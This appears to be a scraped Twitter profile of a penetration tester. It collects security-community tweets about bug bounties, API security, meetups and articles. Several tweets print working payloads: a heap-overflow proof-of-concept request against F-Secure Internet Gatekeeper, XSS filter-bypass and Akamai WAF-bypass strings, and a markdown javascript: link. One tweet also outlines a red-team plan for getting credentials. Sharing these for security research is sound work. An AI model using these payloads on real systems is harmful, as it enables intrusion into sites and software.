Abartan Dhakal (MAD)   

@imhaxormad

21 | Penetration Tester | leader | Infosec writer | Musician | Poet | Personal Tweets | ambassador | I run NepSec Sydney Meetup

Sydney, New South Wales
Joined: July 2013

Tweets


  1. Pinned tweet

    Goals for 2019, 1) organise meetups as I promised when I became ambassador for 2) Try my best to join the triage team to work alongside and in 3) Learn more into Pentest and try harder for OSCP 4) join 💪💪 5) Learn more.

  2. Feb 4

    [PoC] Heap Overflow in F-Secure Internet Gatekeeper POST /submit HTTP/1.1 Host: 192.168.0.24:9012 Content-Length: 21487483844 AAAAAAAAAAAAAAAAAAAAAAAAAAA

  3. Feb 4

    ==API TIPS== To welcome the new year, we published a daily tip on API Security & API Pentesting during the month of January 2020. Check out my new article and explore 31 tips + interesting insights about them.

  4. Feb 3

    Hey bug hunters! Want a look at some of the top vulnerabilities ever found on ? They just released the last blog post I wrote before leaving. Enjoy!

  5. Feb 3

    XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()//

  6. Feb 3

    Just discovered a new 0-day RCE in a well known network monitoring software, the code is well written which took me some time to find the vulnerability. You can exploit it without authentication under some conditions. Stay tuned for the full exploit code and a detailed article!

  8. Feb 2

    In collaboration with , we are very pleased to present the world's first writers challenge coin, the Secjuice Triple Ten. Open to any writer, journalist, researcher or professional focused on information security.

  11. Feb 2

    Third episode of HackStart AMA with Coming soon on your screens.

  12. I wish I could go home and not think of anything at all! 😒 Boring weekends fully out of human interaction 😪

  13. Jan 31

    Akamai WAF Bypass, worked on a recent program <x onauxclick=a=alert,a(domain)>click

  14. Jan 31

    The Complete Guide to CORS (In) Security by . Do give it a read because it's very well written. 😋

  15. Jan 31

    If an application uses markdown, make sure to test it for xss. I used [Click here](javascript:alert(1)), to create a link via markdown and when the user clicks on Click here, the xss will get executed. Read this article.

  17. Jan 30

    I published another blog today. This is a story about an interesting SQL Injection I found. “A Not-So-Blind RCE with SQL Injection” by Prashant Kumar

  18. Jan 31

    The most transparent article on Heap Exploitation by There are few articles too but this is the best one to understand heap in layman's terms.

  20. Jan 29

    How to Red Team #1 - A twitter red team mind map Need credentials from the outside? 1. OSINT (Find e-mail/PII) 2. Social Engineer (Trick someone into clicking an e-mail you sent them w/o a payload) 3. Target External Services (Password Spray or find a vulnerable service )

  21. Jan 30

    Some hunters made over €50.000 in bug bounties with this simple trick. 🤑 Thanks for the , !
